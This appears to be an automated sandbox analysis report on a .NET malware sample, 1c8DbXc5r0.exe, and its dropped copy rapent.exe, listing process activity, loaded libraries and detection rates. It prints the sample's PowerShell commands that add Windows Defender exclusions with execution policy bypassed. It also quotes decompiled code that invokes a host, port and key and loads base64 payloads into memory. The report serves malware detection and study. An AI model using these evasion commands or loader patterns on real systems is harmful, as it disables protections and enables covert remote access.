              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 1c8DbXc5r0.exeReversingLabs: Detection: 89%
              Source: 1c8DbXc5r0.exeVirustotal: Detection: 77%
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeFile read: C:\Users\user\Desktop\1c8DbXc5r0.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\1c8DbXc5r0.exe "C:\Users\user\Desktop\1c8DbXc5r0.exe"
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1c8DbXc5r0.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\rapent.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rapent.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1c8DbXc5r0.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\rapent.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rapent.exe'Jump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
              Source: rapent.lnk.0.drLNK file: ..\..\..\..\..\rapent.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: 1c8DbXc5r0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: 1c8DbXc5r0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 1c8DbXc5r0.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 1c8DbXc5r0.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: rapent.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: rapent.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 1c8DbXc5r0.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 1c8DbXc5r0.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 1c8DbXc5r0.exe, Messages.cs.Net Code: Memory
              Source: rapent.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: rapent.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: rapent.exe.0.dr, Messages.cs.Net Code: Memory
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeCode function: 0_2_00007FFD9B8806A8 push ebx; retf 0_2_00007FFD9B8806EA
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeCode function: 0_2_00007FFD9B8805FA push ebx; retf 0_2_00007FFD9B88060A
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exeCode function: 0_2_00007FFD9B8805F8 push ebx; retf 0_2_00007FFD9B88060A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B78D2A5 pushad ; iretd 1_2_00007FFD9B78D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B970038 push eax; iretd 1_2_00007FFD9B970039
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B972316 push 8B485F92h; iretd 1_2_00007FFD9B97231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B77D2A5 pushad ; iretd 4_2_00007FFD9B77D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B962316 push 8B485F93h; iretd 4_2_00007FFD9B96231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B79D2A5 pushad ; iretd 7_2_00007FFD9B79D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B982316 push 8B485F91h; iretd 7_2_00007FFD9B98231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B76D2A5 pushad ; iretd 11_2_00007FFD9B76D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B952316 push 8B485F94h; iretd 11_2_00007FFD9B95231B
